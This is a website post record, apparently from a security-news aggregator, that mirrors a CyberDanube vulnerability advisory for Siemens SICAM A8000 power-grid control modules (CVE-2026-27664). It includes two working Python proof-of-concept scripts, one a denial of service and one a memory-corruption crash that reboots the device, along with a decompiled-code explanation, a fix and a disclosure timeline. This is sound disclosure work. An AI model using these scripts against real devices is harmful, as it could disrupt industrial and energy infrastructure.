{"id":47250,"date":"2026-04-15T12:45:23","date_gmt":"2026-04-15T12:45:23","guid":{"rendered":"http:\/\/localhost\/?p=47250"},"modified":"2026-04-15T12:45:23","modified_gmt":"2026-04-15T12:45:23","slug":"siemens-sicam-a8000-2530-denial-of-service-memory-corruption","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=47250","title":{"rendered":"\ud83d\udcc4 Siemens SICAM A8000 25.30 Denial of Service \/ Memory Corruption_PACKETSTORM:218981"},"content":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-04-15T16:57:46&#8243;,&#8221;description&#8221;:&#8221;Siemens SICAM A8000 CP-8050\/CP-8031\/CP-8010\/CP-8012 versions 25.30 and below suffer from Content-Length denial of service and XML related memory corruption vulnerabilities&#8230;&#8221;,&#8221;published&#8221;:&#8221;2026-04-15T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2026-04-15T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 Siemens SICAM A8000 25.30 Denial of Service \/ Memory Corruption&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:218981&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2026-27664&#8243;],&#8221;sourceData&#8221;:&#8221;CyberDanube Security Research 20260408-1\\n    &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-\\n                    title| Multiple Vulnerabilities\\n                  product| Siemens SICAM A8000 CP-8050\/CP-8031\/CP-8010\/CP-8012\\n       vulnerable version| \\u003c=V25.30\\n            fixed version| V26.10\\n               CVE number| CVE-2026-27664\\n                   impact| High\\n                 homepage| https:\/\/siemens.com\/\\n                    found| 18.12.2025\\n                       by| S. Dietz\\n                         | (Office Vienna)\\n                         | CyberDanube Security Research\\n                         | Vienna\\n                         |\\n                         | This research was conducted in cooperation with\\n                         | VERBUND Digital Power during a penetration test.\\n                         |\\n                         | https:\/\/www.cyberdanube.com\\n    &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-\\n    \\n    Vendor description\\n    &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-\\n    \\&#8221;Our purpose: We create technology to transform the everyday, for everyone.\\n    By combining the real and the digital worlds, we can help accelerate both\\n    digitalization and sustainability &#8211; so our customers around the world can\\n    become more competitive, resilient and sustainable.\\&#8221;\\n    \\n    Source: https:\/\/www.siemens.com\/global\/en\/company\/about.html\\n    \\n    Vulnerable versions\\n    &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-\\n    Siemens SICAM A8000 CP-8050 Master Module (6MF2805-0AA00) \/ \\u003c=V25.30\\n    Siemens SICAM A8000 CP-8031 Master Module (6MF2803-1AA00) \/ \\u003c=V25.30\\n    Siemens SICAM A8000 CP-8010 Master Module (6MF2801-0AA00) \/ \\u003c=V25.31\\n    Siemens SICAM A8000 CP-8012 Master Module (6MF2801-2AA00) \/ \\u003c=V25.31\\n    \\n    See also the vendor advisory:\\n    https:\/\/cert-portal.siemens.com\/productcert\/html\/ssa-246443.html\\n    \\n    Vulnerability overview\\n    &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-\\n    1) Unauthenticated Denial of Service\\n    A crafted POST request with a large Content-Length and multipart boundary\\n    without matching body seems to make the parser wait for more data. As long as\\n    the connection is open, no other user can interact with the service. IHI00.elf\\n    and RTUM85.elf are impacted by this.\\n    \\n    2) Unauthenticated Memory Corruption (CVE-2026-27664)\\n    A crafted POST request with a malicious XML body can be send to write null\\n    bytes to an arbitrary memory address after the buffers location. This may lead\\n    to a denial of service or remote code execution. This impacts the IHI00.elf as\\n    well as the RTUM85.elf binary.\\n    \\n    Proof of Concept\\n    &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-\\n    1) Unauthenticated Denial of Service\\n    The following python script can be used to temporarily impact the availability\\n    of the device.\\n    \\n    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\\n    #!\/bin\/env python3\\n    # S. Dietz \\u003cfitfrost4\\u003e\\n    from pwn import *\\n    \\n    IP = \\&#8221;localhost\\&#8221;\\n    PORT = 8080\\n    COMP = \\&#8221;ihi\\&#8221;\\n    path = b\\&#8221;\\&#8221;\\n    \\n    if args.IP:\\n        IP = args.IP\\n    if args.PORT:\\n        PORT = int(args.PORT)\\n    if args.COMP:\\n        COMP = args.COMP\\n    if COMP == \\&#8221;rtum85\\&#8221;:\\n        path = b\\&#8221;\/sicweb-ajax\/rtum85\/pwned\\&#8221;\\n    elif COMP == \\&#8221;ihi\\&#8221;:\\n        path = b\\&#8221;\/sicweb-ajax\/auth\\&#8221;\\n    \\n    req = b\\&#8221;\\&#8221;\\n    req += b\\&#8221;POST \\&#8221; + path + b\\&#8221; HTTP\/1.1\\\\r\\\\n\\&#8221;\\n    req += b\\&#8221;Content-Length: \\&#8221; + str(13371337).encode() + b\\&#8221;\\\\r\\\\n\\&#8221;\\n    req += b\\&#8221;Content-Type: multipart\/form-data; boundary=&#8211;pwned\\\\r\\\\n\\&#8221;\\n    req += b\\&#8221;User-Agent: Mozilla\/5.0\\\\r\\\\n\\&#8221;\\n    req += b\\&#8221;Accept: *\/*\\\\r\\\\n\\&#8221;\\n    req += b\\&#8221;Accept-Encoding: gzip, deflate, br\\\\r\\\\n\\&#8221;\\n    req += b\\&#8221;Connection: keep-alive\\\\r\\\\n\\&#8221;\\n    req += b\\&#8221;\\\\r\\\\n\\&#8221;\\n    \\n    log.info(req)\\n    \\n    with remote(IP, PORT) as io:\\n        io.send(req)\\n        io.recv(1337)\\n    \\n    &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-\\n    2) Unauthenticated Memory Corruption (CVE-2026-27664)\\n    The following python script can be used to crash the IHI00.elf application on\\n    the device. As a watchdog (ISV00.elf) is active, the device reboots.\\n    \\n    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\\n    #!\/bin\/env python3\\n    # S. Dietz \\u003cfitfrost4\\u003e\\n    from pwn import *\\n    \\n    IP = \\&#8221;localhost\\&#8221;\\n    PORT = 8080\\n    \\n    if args.IP:\\n        IP = args.IP\\n    \\n    if args.PORT:\\n        PORT = int(args.PORT)\\n    \\n    buf = b&#8217;\\u003c?xml version=\\&#8221;1.0\\&#8221; encoding=\\&#8221;UTF-8\\&#8221;?\\u003e\\\\n&#8217;\\n    buf += b\\&#8221;\\u003cx\\u003e\\&#8221; * 0xa0000\\n    buf += b\\&#8221;\\u003c\/x\\u003e\\&#8221;\\n    buf += b\\&#8221;\\\\r\\\\n\\&#8221;\\n    \\n    body = buf\\n    req = b\\&#8221;\\&#8221;\\n    req += b\\&#8221;POST \/sicweb-ajax\/auth HTTP\/1.1\\\\r\\\\n\\&#8221;\\n    req += b\\&#8221;Content-Length: \\&#8221; + str(len(body)).encode() + b\\&#8221;\\\\r\\\\n\\&#8221;\\n    req += b\\&#8221;sec-ch-ua: \\\\\\&#8221;Chromium\\\\\\&#8221;;v=\\\\\\&#8221;133\\\\\\&#8221;, \\\\\\&#8221;Not(A:Brand\\\\\\&#8221;;v=\\\\\\&#8221;99\\\\\\&#8221;\\\\r\\\\n\\&#8221;\\n    req += b\\&#8221;Content-Type: application\/xml\\\\r\\\\n\\&#8221;\\n    req += b\\&#8221;User-Agent: Mozilla\/5.0\\\\r\\\\n\\&#8221;\\n    req += b\\&#8221;Accept: *\/*\\\\r\\\\n\\&#8221;\\n    req += b\\&#8221;Accept-Encoding: gzip, deflate, br\\\\r\\\\n\\&#8221;\\n    req += b\\&#8221;Connection: keep-alive\\\\r\\\\n\\&#8221;\\n    req += b\\&#8221;\\\\r\\\\n\\&#8221;\\n    req += body\\n    \\n    with remote(IP, PORT) as io:\\n        io.send(req)\\n    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\\n    \\n    The issue arises due to a logic error in the XML parsing. Both binaries use\\n    libexpat which export the function XML_SetElementHandler() which takes a\\n    user-defined structure as well as two function pointer which are executed when\\n    an opening or closing tag occurs.  When looking at start() it can be observed\\n    that the tag_depth is tracked. If the depth is greater than 15, the return\\n    value gets set to -2 and the tag_depth gets incremented.\\n    \\n    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\\n    0052b0d4    void start(struct userdata* userData, char const* xmlchar)\\n    0052b0da        int32_t tag_depth = userData-\\u003etag_depth\\n    0052b0e2        int32_t* entry_r2\\n    0052b0e2\\n    0052b0e2        if (tag_depth != 0)\\n    0052b0e6            if (tag_depth != 1)\\n    0052b0fa                if (tag_depth u\\u003e 0xf)\\n    0052b0fa                    goto too_big\\n    [&#8230;]\\n    0052b152    too_big:\\n    0052b152        userData-\\u003eretval = -2\\n    0052b154        userData-\\u003etag_depth = tag_depth + 1\\n    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\\n    \\n    When a matching closing tag occurs, end() is executed. Due to a missing retval\\n    check, the userData access happens out-of-bounds resulting in an arbitrary\\n    null-byte overflow\\n    \\n    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\\n    0052a570    void end(struct userdata* userData, char const* xmlchar)\\n    [&#8230;]\\n    0052a584\\n    0052a588        int32_t tag_depth = userData-\\u003etag_depth\\n    0052a58c        userData-\\u003etag_depth = tag_depth &#8211; 1\\n    0052a58c\\n    0052a58e        if (tag_depth != 1)\\n    0052a598            *(userData + ((tag_depth &#8211; 2) \\u003c\\u003c 2) + 4) = 0\\n    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\\n    Further investigations showed that the bug allows an attacker to write a word\\n    of null-bytes to arbitrary memory after the buffers location, including the\\n    stack. Due to the extensive usage of shared libraries, this results in a large\\n    attack surface.\\n    &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-\\n    \\n    \\n    Solution\\n    &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-\\n    Install the latest version available.\\n    \\n    \\n    Workaround\\n    &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-\\n    Restrict network access to the device in the infrastructure.\\n    \\n    Recommendation\\n    &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-\\n    CyberDanube recommends to perform a white-box security assessment of the SICAM\\n    A8000 master module devices.\\n    \\n    \\n    Contact Timeline\\n    &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-\\n    2026-02-24: Contacting Siemens ProductCERT\\n    2026-03-04: Siemens ProductCERT confirmed the issue but said the the DoS is a\\n                valid behavior for resource conservation.\\n    2026-03-09: Asking for name and organization for acknowledgement. In addition,\\n                gave an estimation regarding the update timeline.\\n    2026-03-26: Siemens ProductCERT publishes the advisory SSA-246443.\\n    2026-04-08: Coordinated release of security advisory.\\n    \\n    \\n    Web: https:\/\/www.cyberdanube.com\\n    Twitter: https:\/\/twitter.com\/cyberdanube\\n    Mail: research at cyberdanube dot com\\n    \\n    EOF S. Dietz \/ @2025&#8243;,&#8221;sourceHref&#8221;:&#8221;https:\/\/packetstorm.news\/download\/218981&#8243;,&#8221;cvss&#8221;:{&#8220;score&#8221;:8.7,&#8221;severity&#8221;:&#8221;HIGH&#8221;,&#8221;vector&#8221;:&#8221;CVSS:4.0\/AV:N\/AC:L\/AT:N\/PR:N\/UI:N\/VC:N\/SC:N\/VI:N\/SI:N\/VA:H\/SA:N&#8221;,&#8221;version&#8221;:&#8221;4.0&#8243;},&#8221;cvss2&#8243;:{},&#8221;cvss3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;,&#8221;cvssV3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;}},&#8221;href&#8221;:&#8221;https:\/\/packetstorm.news\/files\/id\/218981\/&#8221;,&#8221;category_name&#8221;:&#8221;Exploit&#8221;,&#8221;post_link&#8221;:&#8221;&#8221;,&#8221;product&#8221;:&#8221;&#8221;,&#8221;version&#8221;:&#8221;&#8221;,&#8221;vendor&#8221;:&#8221;&#8221;,&#8221;ai_description&#8221;:&#8221;&#8221;,&#8221;ai_severity&#8221;:&#8221;&#8221;,&#8221;ai_vendor&#8221;:&#8221;&#8221;,&#8221;ai_product&#8221;:&#8221;&#8221;,&#8221;ai_version&#8221;:&#8221;&#8221;,&#8221;ai_score&#8221;:0}<\/p>\n","protected":false},"excerpt":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-04-15T16:57:46&#8243;,&#8221;description&#8221;:&#8221;Siemens SICAM A8000 CP-8050\/CP-8031\/CP-8010\/CP-8012 versions 25.30 and below suffer from Content-Length denial of service and XML related memory corruption vulnerabilities&#8230;&#8221;,&#8221;published&#8221;:&#8221;2026-04-15T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2026-04-15T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 Siemens SICAM A8000 25.30 Denial&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,19,12,15,13,53,7,11,5],"class_list":["post-47250","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-87","tag-exploit","tag-high","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>\ud83d\udcc4 Siemens SICAM A8000 25.30 Denial of Service \/ Memory Corruption_PACKETSTORM:218981 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=47250\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\ud83d\udcc4 Siemens SICAM A8000 25.30 Denial of Service \/ Memory Corruption_PACKETSTORM:218981 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{&#8220;lastseen&#8221;:&#8221;2026-04-15T16:57:46&#8243;,&#8221;description&#8221;:&#8221;Siemens SICAM A8000 CP-8050\/CP-8031\/CP-8010\/CP-8012 versions 25.30 and below suffer from Content-Length denial of service and XML related memory corruption vulnerabilities&#8230;&#8221;,&#8221;published&#8221;:&#8221;2026-04-15T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2026-04-15T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 Siemens SICAM A8000 25.30 Denial...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=47250\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2026-04-15T12:45:23+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"7 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=47250#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=47250\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"\ud83d\udcc4 Siemens SICAM A8000 25.30 Denial of Service \\\/ Memory Corruption_PACKETSTORM:218981\",\"datePublished\":\"2026-04-15T12:45:23+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=47250\"},\"wordCount\":1337,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"CVSS-8.7\",\"exploit\",\"HIGH\",\"news\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=47250#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=47250\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=47250\",\"name\":\"\ud83d\udcc4 Siemens SICAM A8000 25.30 Denial of Service \\\/ Memory Corruption_PACKETSTORM:218981 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2026-04-15T12:45:23+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=47250#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=47250\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=47250#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\ud83d\udcc4 Siemens SICAM A8000 25.30 Denial of Service \\\/ Memory Corruption_PACKETSTORM:218981\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\ud83d\udcc4 Siemens SICAM A8000 25.30 Denial of Service \/ Memory Corruption_PACKETSTORM:218981 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=47250","og_locale":"en_US","og_type":"article","og_title":"\ud83d\udcc4 Siemens SICAM A8000 25.30 Denial of Service \/ Memory Corruption_PACKETSTORM:218981 - zero redgem","og_description":"{&#8220;lastseen&#8221;:&#8221;2026-04-15T16:57:46&#8243;,&#8221;description&#8221;:&#8221;Siemens SICAM A8000 CP-8050\/CP-8031\/CP-8010\/CP-8012 versions 25.30 and below suffer from Content-Length denial of service and XML related memory corruption vulnerabilities&#8230;&#8221;,&#8221;published&#8221;:&#8221;2026-04-15T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2026-04-15T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 Siemens SICAM A8000 25.30 Denial...","og_url":"https:\/\/zero.redgem.net\/?p=47250","og_site_name":"zero redgem","article_published_time":"2026-04-15T12:45:23+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"7 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=47250#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=47250"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"\ud83d\udcc4 Siemens SICAM A8000 25.30 Denial of Service \/ Memory Corruption_PACKETSTORM:218981","datePublished":"2026-04-15T12:45:23+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=47250"},"wordCount":1337,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","CVSS-8.7","exploit","HIGH","news","packetstorm","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=47250#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=47250","url":"https:\/\/zero.redgem.net\/?p=47250","name":"\ud83d\udcc4 Siemens SICAM A8000 25.30 Denial of Service \/ Memory Corruption_PACKETSTORM:218981 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2026-04-15T12:45:23+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=47250#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=47250"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=47250#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"\ud83d\udcc4 Siemens SICAM A8000 25.30 Denial of Service \/ Memory Corruption_PACKETSTORM:218981"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/47250","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=47250"}],"v